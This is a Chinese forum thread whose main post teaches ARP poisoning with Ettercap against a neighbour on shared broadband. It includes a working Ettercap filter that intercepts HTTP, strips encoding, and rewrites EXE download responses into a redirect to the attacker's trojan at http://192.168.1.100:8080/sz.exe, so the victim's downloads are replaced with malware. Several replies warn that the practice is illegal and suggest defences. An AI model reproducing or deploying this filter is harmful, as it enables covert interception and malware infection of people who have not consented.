Ettercap ARP毒化-猜猜你的邻居在干什么?
本帖最后由 mianhua 于 2014-1-5 18:03 编辑是不是和自己的邻居用的一条宽带?
是不是有时候感觉自己很卡?
是不是很想知道他在干什么?
想知道的话看完你就知道了
前几日在某个论坛看到说他利用netfuke写了一个js进行挂马
我认为不现实,且不说js挂马会有提示IE会阻拦
而且妹子也不会下载的
如果你利用这个就很好搞定了
不管妹子下载什么东西都会替换成你的木马,由不得她不点开
Ettercap用到的规则
# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXEn");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothingn");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://192.168.1.100:8080/sz.exe
");
msg("redirect successn");
}
}
相关文章:
演示地址:链接: http://pan.baidu.com/s/1hqsnYtA 密码: 6qy9 ARP欺骗,以前在局域网实践过。容易把网搞乱 亲,虽然有点挖坟的意思,但是还是想请您提供一下演示过程:lol
Re: Ettercap ARP毒化-猜猜你的邻居在干什么?
这个教程确实展示了ARP欺骗和文件替换的技术原理,但请注意,未经他人同意监听或篡改网络流量是违法行为,也是不道德的行为。建议仅用于学习网络安全知识,在自己的实验环境中测试,不要针对邻居或其他用户操作。如果网络卡顿或怀疑被攻击,正确的做法是检查路由器、升级固件或使用加密连接(HTTPS)。希望大家都能合法、安全地使用网络技术。Re: Ettercap ARP毒化-猜猜你的邻居在干什么?
这个教程看起来挺详细的,不过我得提醒一下,ARP欺骗和替换下载文件这种行为已经涉及非法入侵和传播恶意软件了。用在自己家里测试学习是可以,但拿去搞邻居或者任何人,轻则导致网络纠纷,重则触犯刑法中的“非法控制计算机信息系统”或“破坏计算机信息系统”罪。希望只是抱着研究网络原理的心态来读这篇帖子的,实际操作前务必三思,别拿自己做实验以外的人来试手。Re: Ettercap ARP毒化-猜猜你的邻居在干什么?
感谢分享,Ettercap的ARP毒化确实是局域网渗透测试中的经典技术,这个过滤规则也很有启发性。不过还是提醒一下,这类操作仅限在自建实验室或获得授权的情况下进行,滥用可能会触犯法律。希望楼主后续能多分享一些防御ARP欺骗的思路,这样对大家帮助更大。
页:
[1]